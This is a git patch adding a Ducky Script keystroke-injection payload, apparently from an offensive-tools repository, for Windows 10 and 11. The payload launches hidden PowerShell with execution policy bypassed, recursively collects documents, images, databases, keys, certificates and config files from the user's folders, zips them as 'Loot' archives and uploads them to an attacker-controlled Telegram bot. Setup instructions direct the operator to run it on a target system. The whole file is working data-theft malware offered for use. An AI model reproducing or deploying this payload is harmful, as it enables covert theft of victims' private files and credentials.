From dec5f34b1147321e83a672db3c75840594aa618c Mon Sep 17 00:00:00 2001
From: beigeworm <93350544+beigeworm@users.noreply.github.com>
Date: Mon, 18 Sep 2023 17:49:01 +0100
Subject: [PATCH] Add files via upload

---
 OSINT/Exfiltrate files to Telegram.txt | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 OSINT/Exfiltrate files to Telegram.txt

diff --git a/OSINT/Exfiltrate files to Telegram.txt b/OSINT/Exfiltrate files to Telegram.txt
new file mode 100644
index 0000000..bd1ab92
--- /dev/null
+++ b/OSINT/Exfiltrate files to Telegram.txt	
@@ -0,0 +1,26 @@
+REM Title: beigeworm's Exfiltrate files to Telegram.
+REM Author: @beigeworm
+REM Description: Using a Telegram Bot's Chat to receive all matching files in bulk zips of 50mb each. (searches user folders for pictures, video, text files etc..)
+REM Target: Windows 10 and 11
+
+REM SETUP INSTRUCTIONS
+REM 1. Install Telegram and make an account if you haven't already.
+REM 2. Visit https://t.me/botfather and make a bot. (make a note of the API token)
+REM 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start)
+REM 4. Run the script on target system
+REM 5. Check telegram chat for 'waiting to connect' message.
+REM 6. This script has a feature to wait until you start the session from Telegram.
+REM 7. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer.
+REM 8. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+GUI r
+DELAY 750
+STRING powershell -NoP -NonI -W Hidden -Exec Bypass
+ENTER
+DELAY 4000
+STRING $Token = "TOKEN_HERE";$URL='https://api.telegram.org/bot{0}' -f $Token;while($chatID.length -eq 0){;$updates = Invoke-RestMethod -Uri ($url + "/getUpdates");if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1];if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}};Sleep 10};Function Exfiltrate {param ([string[]]$FileType,[string[]]$Path);$maxZipFileSize = 50MB;$currentZipSize = 0;$index = 1;$zipFilePath ="$env:temp/Loot$index.zip";$MessageToSend = New-Object psobject ;$MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID;$MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." -Force;irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json";If($Path -ne $null){$foldersToSearch = "$env:USERPROFILE\"+$Path}else{$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos")};If($FileType -ne $null){$fileExtensions = "*."+$FileType}else{$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft")}Add-Type -AssemblyName System.IO.Compression.FileSystem;$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create');$escmsg = "Files from : "+$env:COMPUTERNAME;foreach ($folder in $foldersToSearch){foreach ($extension in $fileExtensions){$files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse;foreach ($file in $files) {$fileSize = $file.Length;if ($currentZipSize + $fileSize -gt $maxZipFileSize){$zipArchive.Dispose();$currentZipSize = 0;curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument";rm -Path $zipFilePath -Force;Sleep 1;$index++;$zipFilePath ="$env:temp/Loot$index.zip";$zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create')}$entryName = $file.FullName.Substring($folder.Length + 1);[System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName);$currentZipSize += $fileSize}}}$zipArchive.Dispose();curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument";rm -Path $zipFilePath -Force;Write-Output "$env:COMPUTERNAME : Exfiltration Complete."}Exfiltrate;sleep 5;exit
+DELAY 500
+ENTER